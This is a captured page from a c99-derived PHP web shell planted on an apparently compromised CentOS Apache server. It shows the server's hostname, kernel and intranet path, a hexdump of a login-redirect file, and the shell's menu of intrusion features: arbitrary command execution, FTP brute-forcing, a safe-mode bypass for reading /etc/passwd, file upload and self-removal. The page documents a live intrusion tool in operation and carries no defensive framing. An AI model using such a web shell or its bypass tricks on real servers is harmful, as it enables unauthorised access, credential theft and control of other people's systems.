!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/intranet/   drwxrwxrwx
Free 52.82 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     redir.php (1.72 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/intranet/redir.php
Size 1.72 KB
MD5 8ca9d07a3525f6cbe4a3bebf5b4f8ac0
Owner/Group root/root
Perms-rw-r--r--
Create time 17/10/2012 15:26:41
Access time 06/07/2024 16:46:29
MODIFY time 17/10/2012 07:08:45

HEXDUMP PREVIEW
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
3C 3F 0D 0A 73 65 73 73 69 6F 6E 5F 73 74 61 72 74 28 29 3B 0D 0A 69 6E
63 6C 75 64 65 5F 6F 6E 63 65 28 27 63 6F 6E 66 69 67 2E 70 68 70 27 29
3B 0D 0A 0D 0A 2F 2F 20 20 43 68 65 63 6B 20 46 72 6F 6D 20 4C 6F 67 6F
75 74 20 50 61 67 65 0D 0A 69 66 20 28 24 73 74 61 74 75 73 20 3D 3D 20
22 6C 6F 67 6F 75 74 22 29 20 7B 0D 0A 09 09 68 65 61 64 65 72 28 22 4C
6F 63 61 74 69 6F 6E 3A 20 6C 6F 67 69 6E 2E 70 68 70 22 29 3B 0D 0A 09
09 73 65 73 73 69 6F 6E 5F 64 65 73 74 72 6F 79 28 29 3B 0D 0A 09 09 24
73 74 61 74 75 73 20 3D 20 22 6C 6F 67 6F 75 74 22 3B 0D 0A 7D 0D 0A 65
<?  session_start();  in
clude_once('config.php')
;    //  Check From Logo
ut Page  if ($status == 
"logout") {   header("L
ocation: login.php");  
session_destroy();   $
status = "logout";  }  e

HEXDUMP: [Full] [Preview]
Base64:
[Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--